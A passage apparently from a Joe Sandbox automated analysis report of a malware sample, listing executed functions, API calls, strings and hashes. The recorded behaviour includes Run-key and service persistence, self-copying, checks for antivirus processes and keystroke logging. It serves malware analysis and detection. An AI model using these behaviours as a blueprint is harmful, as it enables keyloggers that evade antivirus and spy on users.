54462 248f2b7 GetPEB 54460->54462 54463 24d9bd5 GetPEB 54461->54463 54464 247ae1e 54461->54464 54465 24d9ba1 54462->54465 54463->54464 54464->54452 54468 248f2b7 GetPEB 54464->54468 54466 24d9ba5 GetPEB 54465->54466 54465->54467 54466->54467 54467->54459 54469 24d9bed 54468->54469 54470 24d9bf1 GetPEB 54469->54470 54471 24d9c00 54469->54471 54470->54471 54471->54448 54472->54419 54473->54426 54474 248f2d7 54475 248f37e 54474->54475 54476 248f355 54474->54476 54477 248f3c1 54475->54477 54478 248f3c6 GetPEB 54475->54478 54481 248f3a5 54475->54481 54477->54478 54479 248f3e8 54478->54479 54480 248f3d3 54478->54480 54485 248f3f2 GetPEB 54479->54485 54489 248f401 54479->54489 54480->54479 54482 248f3d8 GetPEB 54480->54482 54543 252b30f 26 API calls __startOneArgErrorHandling 54481->54543 54482->54479 54484 248f3ad 54485->54489 54486 248f5b7 54487 248f5fe GetPEB 54486->54487 54525 248f617 54486->54525 54487->54525 54488 24904b4 54490 2490501 GetPEB 54488->54490 54491 2490517 54488->54491 54489->54486 54489->54488 54515 248f49e 54489->54515 54490->54491 54496 248f2b7 GetPEB 54491->54496 54492 248fe9b 54494 248fece 54492->54494 54499 248feb7 54492->54499 54493 248fe71 54495 247a709 51 API calls 54493->54495 54498 248c197 20 API calls 54494->54498 54494->54515 54495->54515 54497 249055b 54496->54497 54500 249055f GetPEB 54497->54500 54504 2490578 54497->54504 54498->54515 54501 247a709 51 API calls 54499->54501 54500->54504 54501->54515 54502 247abbd 11 API calls 54503 248f83f 54502->54503 54505 248f8a1 54503->54505 54506 248f843 54503->54506 54507 248f2b7 GetPEB 54504->54507 54511 248f8e6 GetPEB 54505->54511 54538 248f852 54505->54538 54509 247a709 51 API calls 54506->54509 54510 24905b0 54507->54510 54508 247abbd 11 API calls 54508->54538 54509->54538 54512 24905b4 GetPEB 54510->54512 54513 24905c7 54510->54513 54514 248f8f3 GetPEB 54511->54514 54531 248f90e 54511->54531 54512->54513 54518 24905d1 GetPEB 54513->54518 54534 24905f9 54513->54534 54514->54531 54516 247a709 51 API calls 54516->54538 54517 248fd75 54520 248fdbd GetPEB 54517->54520 54521 248fe1d 54517->54521 54523 24905e0 54518->54523 54518->54534 54519 248f2b7 GetPEB 54524 2490625 54519->54524 54526 248fdca GetPEB 54520->54526 54537 248fde5 54520->54537 54521->54492 54521->54493 54522 248fb1e GetPEB 54527 248fb2b GetPEB 54522->54527 54522->54538 54528 248f2b7 GetPEB 54523->54528 54529 2490629 GetPEB 54524->54529 54530 249063c 54524->54530 54525->54502 54525->54505 54525->54521 54525->54538 54526->54537 54527->54538 54532 24905e5 54528->54532 54529->54530 54530->54515 54536 248f2b7 GetPEB 54530->54536 54533 248f934 GetPEB 54531->54533 54532->54534 54535 24905e9 GetPEB 54532->54535 54533->54538 54534->54519 54535->54534 54540 249064b 54536->54540 54541 248fe0e GetPEB 54537->54541 54538->54508 54538->54516 54538->54517 54538->54521 54538->54522 54539 248fb6c GetPEB 54538->54539 54539->54538 54540->54515 54542 249064f GetPEB 54540->54542 54541->54521 54542->54515 54543->54484

                                                                    Executed Functions

                                                                    Function 100095A4 Relevance: 129.9, APIs: 49, Strings: 25, Instructions: 377stringsleepthreadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 100095a4-10009617 GetInputState GetCurrentThreadId PostThreadMessageA GetMessageA call 10009563 wsprintfA GetVersionExA 3 10009619-10009625 call 1000a053 0->3 4 1000962d-10009633 0->4 8 1000962a 3->8 6 10009635 call 100081af 4->6 7 1000963a-10009640 4->7 6->7 10 10009646-1000967d GetVersionExA call 10007b22 7->10 11 100098c7-10009956 sprintf call 1000712b lstrlenA 7->11 8->4 18 100096a9-100096b0 10->18 19 1000967f-10009685 10->19 16 10009958-10009969 call 10005437 call 10008206 11->16 17 1000996c-1000998d call 10009563 wsprintfA 11->17 16->17 35 10009a03-10009a1b memset GetModuleFileNameA 17->35 36 1000998f-10009a01 memset GetModuleFileNameA SHGetSpecialFolderPathA lstrcatA * 3 MoveFileA 17->36 20 100096b6-100096bd call 10009e13 18->20 21 100097e8-100097ea 18->21 19->18 24 10009687-10009691 CreateThread 19->24 39 100096fe-10009746 ExpandEnvironmentStringsA wsprintfA strlen 20->39 40 100096bf-100096f9 Sleep StartServiceCtrlDispatcherA Sleep StartServiceCtrlDispatcherA 20->40 26 100097f0-1000982b call 10005437 call 10008206 call 1000a44e 21->26 27 10009a59-10009a82 call 1000a053 WaitForSingleObject CloseHandle 21->27 30 10009697-100096a7 call 10008e92 Sleep 24->30 60 1000982d-1000983d CreateThread 26->60 61 1000983f-10009893 wsprintfA GetModuleFileNameA CopyFileA RegOpenKeyExA 26->61 43 10009a21-10009a4a Sleep call 1000a053 WaitForSingleObject CloseHandle 35->43 36->43 47 10009748-10009755 strlen 39->47 48 1000975c-100097d6 strcat * 2 GetModuleFileNameA CopyFileA call 10009a83 call 10005437 call 10008206 Sleep 39->48 45 100097dc-100097e2 call 10008e92 ExitProcess 40->45 57 10009a50-10009a57 Sleep 43->57 47->48 48->45 57->57 63 100098b5-100098c5 call 10008e92 Sleep 60->63 61->63 64 10009895-100098af RegSetValueExA RegCloseKey 61->64 64->63
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 100095B0
                                                                    • GetCurrentThreadId.KERNEL32 ref: 100095BB
                                                                    • PostThreadMessageA.USER32(00000000), ref: 100095C2
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 100095D2
                                                                      • Part of subcall function 10009563: CoInitialize.OLE32(00000000), ref: 1000956C
                                                                      • Part of subcall function 10009563: CoCreateGuid.OLE32(100095DD,?,100095DD), ref: 10009576
                                                                      • Part of subcall function 10009563: _snprintf.MSVCRT ref: 10009590
                                                                      • Part of subcall function 10009563: CoUninitialize.COMBASE(?,100095DD), ref: 10009599
                                                                    • wsprintfA.USER32 ref: 100095F0
                                                                    • GetVersionExA.KERNEL32(?), ref: 1000960C
                                                                    • GetVersionExA.KERNEL32(?), ref: 10009657
                                                                    • CreateThread.KERNEL32(00000000,00000000,100094E6,00000000,00000000,00000000), ref: 10009691
                                                                    • Sleep.KERNEL32(000F4240), ref: 100096A1
                                                                    • Sleep.KERNEL32(000001F4), ref: 100096DE
                                                                    • StartServiceCtrlDispatcherA.ADVAPI32(Rsjshd fzfgkqcm), ref: 100096EA
                                                                    • Sleep.KERNEL32(000003E8), ref: 100096F1
                                                                    • StartServiceCtrlDispatcherA.ADVAPI32(Rsjshd fzfgkqcm), ref: 100096F7
                                                                    • ExpandEnvironmentStringsA.KERNEL32(%ProgramFiles%\,?,00000104), ref: 1000970F
                                                                    • wsprintfA.USER32 ref: 1000972D
                                                                    • strlen.MSVCRT ref: 10009736
                                                                    • strlen.MSVCRT ref: 1000974F
                                                                    • strcat.MSVCRT(?,10012A68), ref: 10009768
                                                                    • strcat.MSVCRT(?,?,?,10012A68), ref: 10009778
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 1000978D
                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 100097A2
                                                                    • Sleep.KERNEL32(000001F4), ref: 100097D6
                                                                    • CreateThread.KERNEL32(00000000,00000000,100093AC,00000000,00000000,00000000), ref: 10009837
                                                                    • wsprintfA.USER32 ref: 1000984D
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000985F
                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 10009871
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 1000988B
                                                                    • RegSetValueExA.ADVAPI32(?,100145A0,00000000,00000001,?,00000050), ref: 100098A6
                                                                    • RegCloseKey.ADVAPI32(?), ref: 100098AF
                                                                    • Sleep.KERNEL32(000F4240), ref: 100098BF
                                                                    • sprintf.MSVCRT ref: 100098F5
                                                                    • lstrlenA.KERNEL32(?), ref: 1000994E
                                                                    • wsprintfA.USER32 ref: 1000997B
                                                                    • memset.MSVCRT ref: 10009996
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100099A7
                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002B,00000000), ref: 100099B8
                                                                    • lstrcatA.KERNEL32(?,10012A68), ref: 100099D0
                                                                    • lstrcatA.KERNEL32(?,?), ref: 100099DD
                                                                    • lstrcatA.KERNEL32(?,.exe), ref: 100099EB
                                                                    • MoveFileA.KERNEL32(?,?), ref: 100099FB
                                                                    • memset.MSVCRT ref: 10009A0A
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10009A1B
                                                                    • Sleep.KERNEL32(00000032), ref: 10009A29
                                                                    • ExitProcess.KERNEL32 ref: 100097E2
                                                                      • Part of subcall function 1000A053: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,75920F00,00000000,00000000,00000000,00000000), ref: 1000A06C
                                                                      • Part of subcall function 1000A053: _beginthreadex.MSVCRT ref: 1000A08A
                                                                      • Part of subcall function 1000A053: WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000A09A
                                                                      • Part of subcall function 1000A053: CloseHandle.KERNEL32(?), ref: 1000A0A3
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10009A43
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10009A4A
                                                                    • Sleep.KERNEL32(000F4240), ref: 10009A55
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10009A71
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10009A78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileSleep$CloseCreateModuleNameThreadwsprintf$HandleObjectSingleWaitlstrcat$CopyCtrlDispatcherMessageServiceStartVersionmemsetstrcatstrlen$CurrentEnvironmentEventExitExpandFolderGuidInitializeInputMoveOpenPathPostProcessSpecialStateStringsUninitializeValue_beginthreadex_snprintflstrlensprintf
                                                                    • String ID: %$%ProgramFiles%\$.exe$Albmnt wohqpopu$C$C:\Windows\%s$Default$Dhttdfv.exe$Evyydy snigczyzhqwwiyebny$G$RavMonD.exe$Rsjshd fzfgkqcm$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$\$c$e$n$n$o$o$p$r$s$t$u
                                                                    • API String ID: 4263603353-48054914
                                                                    • Opcode ID: 41af10e99478f0a1130f34c258fc11d6d2eafc1331e1bbe73cb7547be42e5fbc
                                                                    • Instruction ID: 22f1004e0bc85a243cc06aae3df85499ecf04fd817c36f45f7f7c6c6afa48464
                                                                    • Opcode Fuzzy Hash: 41af10e99478f0a1130f34c258fc11d6d2eafc1331e1bbe73cb7547be42e5fbc
                                                                    • Instruction Fuzzy Hash: 4BD17EB1C0425CBEFB10DBA48C89EEF7BBCEB05384F0041A5F605A6156DB759F888B61
                                                                    Function 100073C4 Relevance: 40.5, APIs: 16, Strings: 7, Instructions: 261stringlibraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,759183C0,00000000,00000001), ref: 10007A1D
                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 10007A34
                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 10007A3E
                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 10007A49
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10007A52
                                                                    • strstr.MSVCRT ref: 10007A75
                                                                    • Process32First.KERNEL32(00000064,?), ref: 10007A97
                                                                    • lstrcmpiA.KERNEL32(10013D40,?), ref: 10007AA7
                                                                    • Process32Next.KERNEL32(00000064,?), ref: 10007ABB
                                                                    • lstrcatA.KERNEL32(00000000,2E796172), ref: 10007AC6
                                                                    • lstrcatA.KERNEL32(00000000,10012C44), ref: 10007ACC
                                                                    • strstr.MSVCRT ref: 10007ADE
                                                                    • CloseHandle.KERNEL32(00000064), ref: 10007AED
                                                                    • lstrlenA.KERNEL32(00000000), ref: 10007AF6
                                                                    • lstrcpyA.KERNEL32(00000000,-/-), ref: 10007B0B
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 10007B1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryProcess32lstrcatstrstr$CloseCreateFirstFreeHandleLoadNextSnapshotToolhelp32lstrcmpilstrcpylstrlen
                                                                    • String ID: -/-$CreateToolhelp32Snapshot$Mcshield.exe$Process32First$Process32Next$RavMonD.exe$kernel32.dll
                                                                    • API String ID: 3925129150-2766451689
                                                                    • Opcode ID: 52d0e8ba549a091069c9d0fe9cc9b3e36a9947ec2f7a311238eda45ef7237df1
                                                                    • Instruction ID: 26e7351027791b1232d400d7278115713019b26239143135cafc233efcac8e19
                                                                    • Opcode Fuzzy Hash: 52d0e8ba549a091069c9d0fe9cc9b3e36a9947ec2f7a311238eda45ef7237df1
                                                                    • Instruction Fuzzy Hash: 99F147B09052E9AADF61CF5189886CEBF75FB05740F90C1D8914A7F250CBBA8AC1CF94
                                                                    Function 10004B31 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 157keyboardsleepstringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 354 10004b31-10004b45 355 10004b50-10004b94 memset 354->355 356 10004b47-10004b4d 354->356 357 10004b97-10004bae Sleep lstrlenA 355->357 358 10004bb0-10004bb7 call 10004a4b 357->358 359 10004bff 357->359 369 10004be2-10004bfc call 10004967 memset 358->369 370 10004bb9-10004bca call 10004967 * 2 358->370 360 10004c02-10004c20 GetKeyState GetAsyncKeyState 359->360 362 10004c22-10004c2d GetKeyState 360->362 363 10004c9d-10004cad 360->363 367 10004c4e-10004c59 GetKeyState 362->367 368 10004c2f-10004c32 362->368 365 10004cb3-10004cb9 363->365 366 10004d3f-10004d4a 363->366 373 10004cc2-10004cd4 lstrlenA 365->373 374 10004cbb-10004cc0 365->374 366->360 372 10004d50-10004d52 366->372 376 10004c79-10004c7b 367->376 377 10004c5b-10004c5d 367->377 368->367 375 10004c34-10004c37 368->375 369->359 398 10004bcf-10004be0 memset 370->398 372->357 383 10004cd6-10004cd9 373->383 384 10004ced-10004d0b call 10004967 memset 373->384 382 10004ce0-10004ce7 lstrcatA 374->382 375->367 385 10004c39-10004c3c 375->385 379 10004c8d-10004c98 376->379 380 10004c7d-10004c88 376->380 377->379 386 10004c5f-10004c62 377->386 379->366 380->366 382->384 388 10004cdb 383->388 389 10004d0d-10004d18 383->389 384->366 385->367 390 10004c3e-10004c49 385->390 386->376 392 10004c64-10004c67 386->392 388->382 395 10004d25-10004d27 389->395 396 10004d1a-10004d23 389->396 390->366 392->376 397 10004c69-10004c74 392->397 395->366 400 10004d29-10004d2c 395->400 399 10004d32-10004d39 lstrcatA 396->399 397->366 398->359 399->366 400->399
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: State$memset$AsyncSleeplstrlen
                                                                    • String ID: <BackSpace>$<Enter>
                                                                    • API String ID: 2124264721-3792472884
                                                                    • Opcode ID: 67ec3002a42366a28b666794439f13539bcae8029d356230e331e6032219c91b
                                                                    • Instruction ID: 0bb4407308772e355f15df9d5ce1b7e6b20cfbfe95ad1229b8953d6428a585f3
                                                                    • Opcode Fuzzy Hash: 67ec3002a42366a28b666794439f13539bcae8029d356230e331e6032219c91b
                                                                    • Instruction Fuzzy Hash: 3151A0F1901668ABFB10DFA08C48F8E7769EB803D1F1344A6E505A3149DB30DE418B6A
                                                                    Function 02492657 Relevance: 4.7, Strings: 2, Instructions: 2184COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$?
                                                                    • API String ID: 0-2193943856
                                                                    • Opcode ID: 9556bea370f36b6a6f2d737105d9cb40ff0e56c78c4db4436c228565dcb0ceb1
                                                                    • Instruction ID: 5d4837e4bf8cc260d1c993e164ab01f0d22f4318051767e947a4f19709c8e3dd
                                                                    • Opcode Fuzzy Hash: 9556bea370f36b6a6f2d737105d9cb40ff0e56c78c4db4436c228565dcb0ceb1
                                                                    • Instruction Fuzzy Hash: 6D13AE70A00655DFDF25CF69C4907AABFF2BF49304F1481AAD859AB381D774A886CF90
                                                                    Function 0248F2D7 Relevance: 1.6, Instructions: 1603COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e765c198c796db5f36917cd26dde93d41df4f86f9496303949a514053bccd0ff
                                                                    • Instruction ID: 64ed138c74ec3a92dfc0ca092d6b4643c414fbf3ed8b3f973cbdc42094710290
                                                                    • Opcode Fuzzy Hash: e765c198c796db5f36917cd26dde93d41df4f86f9496303949a514053bccd0ff
                                                                    • Instruction Fuzzy Hash: 44E2D270A10255CFDB25DF68C490BAEBBF2FF49304F55819AD849AB781D734A886CF90
                                                                    Function 024BE207 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(02506B22,000000FF,0000001C,0000000C,00008000,00000000,00000000,?,02506966,000000FF,00000000,00000000,0000000C,00001000,00000004,76F8D260), ref: 024BE211
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: fe7a695d54c47184f6869f139371b110fb42ca037c2ef3b0bac4e3626bfa7998
                                                                    • Instruction ID: 5e4434a41b56dcab8794d83cf17c84d42851e9d31ee7a6c4386824e225b1f118
                                                                    • Opcode Fuzzy Hash: fe7a695d54c47184f6869f139371b110fb42ca037c2ef3b0bac4e3626bfa7998
                                                                    • Instruction Fuzzy Hash: 8C90023120188892D5107158C40474A000587D0301FBAC411A452465CDCA9589917161
                                                                    Function 0247ABBD Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: `
                                                                    • API String ID: 2994545307-2679148245
                                                                    • Opcode ID: 15bc7b4a352d17b6c3338fcec568f626da830449a554b9b67442bb4acd5fab38
                                                                    • Instruction ID: 326864728ecd9f63443f5a546f1000cf7c26d22ae45bd2fec65772f30990f72f
                                                                    • Opcode Fuzzy Hash: 15bc7b4a352d17b6c3338fcec568f626da830449a554b9b67442bb4acd5fab38
                                                                    • Instruction Fuzzy Hash: 38612472204681AFD722DB68C854FAB77E9FF80714F09055AF9A5CB381C734D841CB62
                                                                    Function 0247A709 Relevance: .7, Instructions: 684COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7ab46767922477e6e6069f4d234c0e46a9218f448f82e68b9a693029df00253b
                                                                    • Instruction ID: 494195886b5c341bb40c076f33aaea39c8e309164d5c3e00b881e84bb38266a2
                                                                    • Opcode Fuzzy Hash: 7ab46767922477e6e6069f4d234c0e46a9218f448f82e68b9a693029df00253b
                                                                    • Instruction Fuzzy Hash: 1E42FD752086819FC715DF29C494BABBBE6FF84708F04496EE8A6CB351D730D886CB52
                                                                    Function 0248BACC Relevance: .3, Instructions: 300COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 713b06d4c9637dcba6df182544027853be67856c55da38feffd0d598247cbe01
                                                                    • Instruction ID: c2e207169eedad01c1a7ba93e93263c1e1d7dd4731de811ffe8f85913c785611
                                                                    • Opcode Fuzzy Hash: 713b06d4c9637dcba6df182544027853be67856c55da38feffd0d598247cbe01
                                                                    • Instruction Fuzzy Hash: C3B10531610645AFEB16DB68C990BBFB7F6EF84308F14016AD552EB781DB70E942CB50
                                                                    Function 0247AD51 Relevance: .2, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cd369015ec5a4de55e1c9be4511f2a7df380c65403e721712cf3f6192da1ed95
                                                                    • Instruction ID: 01a5ece06b28cc8272d638a23e1ab968b1b021d67f1fad0be118effd23c17776
                                                                    • Opcode Fuzzy Hash: cd369015ec5a4de55e1c9be4511f2a7df380c65403e721712cf3f6192da1ed95
                                                                    • Instruction Fuzzy Hash: 34510331200A84EFD712DBA8C994FAABBF9FF05704F0505A6E591DB792D774E940CB50
                                                                    Function 10008206 Relevance: 75.4, APIs: 4, Strings: 39, Instructions: 129stringtimeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 100082D3
                                                                    • GetLocalTime.KERNEL32(?), ref: 100082DC
                                                                    • wsprintfA.USER32 ref: 10008353
                                                                    • lstrlenA.KERNEL32(?,00000000), ref: 10008383
                                                                      • Part of subcall function 1000A87A: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,75A78400,00000000,?,1000AF24,1000D480,000000FF,\Services\%s,10005404,80000002,?,00000072,00000001,00000065,00000000), ref: 1000A8A7
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 1000A8BE
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 1000A8C9
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000A8D4
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 1000A8DF
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000A8EA
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000A8F5
                                                                      • Part of subcall function 1000A87A: FreeLibrary.KERNEL32(00000000), ref: 1000A9E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Librarywsprintf$FreeLoadLocalTimelstrlen
                                                                    • String ID: %$%4d-%.2d-%.2d$C$C$E$M$MarkTime$Rsjshd fzfgkqcm$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                    • API String ID: 3526305938-1197169607
                                                                    • Opcode ID: f2cbf916df55951652af7666c0576ac5b62ca3199c26ca39358bd8c707d0f92b
                                                                    • Instruction ID: 35ad1746f5ab4fd9615454abb90a141351abdf455c6bc105aa270bdc8869e458
                                                                    • Opcode Fuzzy Hash: f2cbf916df55951652af7666c0576ac5b62ca3199c26ca39358bd8c707d0f92b
                                                                    • Instruction Fuzzy Hash: 3E51E851C086CCEDEB12C7E8D8487DEBFB55B26349F0840D9E5847A282C6BE165CC776
                                                                    Function 1000712B Relevance: 63.1, APIs: 3, Strings: 39, Instructions: 80COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 72 1000712b-10007239 memset * 2 wsprintfA call 1000a5cc
                                                                    APIs
                                                                    • memset.MSVCRT ref: 10007157
                                                                    • memset.MSVCRT ref: 10007169
                                                                    • wsprintfA.USER32 ref: 1000720F
                                                                      • Part of subcall function 1000A5CC: memset.MSVCRT ref: 1000A601
                                                                      • Part of subcall function 1000A5CC: memset.MSVCRT ref: 1000A614
                                                                      • Part of subcall function 1000A5CC: memset.MSVCRT ref: 1000A622
                                                                      • Part of subcall function 1000A5CC: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A62F
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000A647
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 1000A657
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 1000A667
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1000A674
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 1000A681
                                                                      • Part of subcall function 1000A5CC: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A69F
                                                                      • Part of subcall function 1000A5CC: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A80C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
